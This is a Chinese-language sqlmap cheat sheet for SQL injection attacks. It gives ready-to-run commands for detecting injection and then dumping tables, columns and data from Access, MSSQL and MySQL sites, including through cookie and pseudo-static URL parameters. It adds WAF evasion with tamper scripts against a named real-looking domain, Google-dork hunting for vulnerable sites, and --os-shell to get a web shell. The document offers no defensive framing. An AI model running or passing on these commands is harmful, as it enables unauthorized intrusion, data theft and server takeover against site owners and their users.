ACCESS数据库注入

#注入点:http://www.xxx.cn/news.asp?nid=279 注入点
sqlmap -u http://www.xxx.cn/news.asp?nid=279      #判断注入
sqlmap -u http://www.xxx.cn/news.asp?nid=279 --tables    #猜表
sqlmap -u http://www.xxx.cn/news.asp?nid=279 --columns -T 表名   # 猜字段
sqlmap -u http://www.xxx.cn/news.asp?nid=279 --dump -T 表名 -C 字段   # 爆数据

MSSQL数据库注入

#注入点:http://www.xxx.com/news/content.jsp?id=43
sqlmap -u http://www.xxx.com/news/content.jsp?id=43  #判断注入
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 --dbs  #列库
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 -D 库名 --tables  #猜表
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 -D 库名 -T 表名 --columns  #猜字段
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 -D 库名 -T 表名 -C "字段名" --dump  #爆数据

cookies注入

#注入点:http://xxx.com/ProductShow.asp?ID=130
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --level 2  #判断注入
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --table --level 2  #猜表
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --columns -T 表名 --level 2  #猜字段
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --dump -T 表名 -C "字段名" --level 2  #爆数据

伪静态注入

#注入点:http://www.xxx.com/index.php/Index/view/id/40.html
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html  #判断注入
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html --dbs  #列库
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html -D 库名 --tables  #猜表
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html -D 库名 -T 表名 --columns  #猜字段
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html -D 库名 -T 表名 -C "字段名" --dump  #爆数据

MYSQL数据库注入

#注入点:http://www.xxx111.com/news/gis/region.php?id=3
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3  #判断注入
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 --dbs  #列库
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 -D 库名 --tables  #猜表
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 -D 库名 -T 表名 --columns  #猜字段
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 -D 库名 -T 表名 -C "字段名" --dump  #爆数据

WAF防火墙的绕过

使用tamper脚本修改请求从而逃避WAF的规则检测
tamper脚本下载:https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
temper脚本:
针对MYSQL:space2morehash.py、space2hash.py
空格替换:space2mssqlblank.py、space2mysqlblank.py、
打乱编码:charencode.py、chardoubleencode.py
针对asp/asp.net:charunicodeencode.py、percentage.py

#注入点:http://www.bmw.com.tw/news/content.jsp?id=43
sqlmap -u http://www.bmw.com.tw/news/content.jsp?id=43 -v 3 --batch --tamper "space2morehash.py"  #判断注入
sqlmap -u http://www.bmw.com.tw/news/content.jsp?id=43 -v 3 -D 库名 -T 表名 -C "字段名" --dump --batch --tamper "space2morehash.py"  #爆数据

谷歌搜索注入点注入

sqlmap -g inurl:asp?id=  #命令
#post登录注入
sqlmap -u 地址 --forms  #命令
#交互写shell
sqlmap -u 地址 --os-shell   #命令
#生成上传文件:tmpuoiuz.php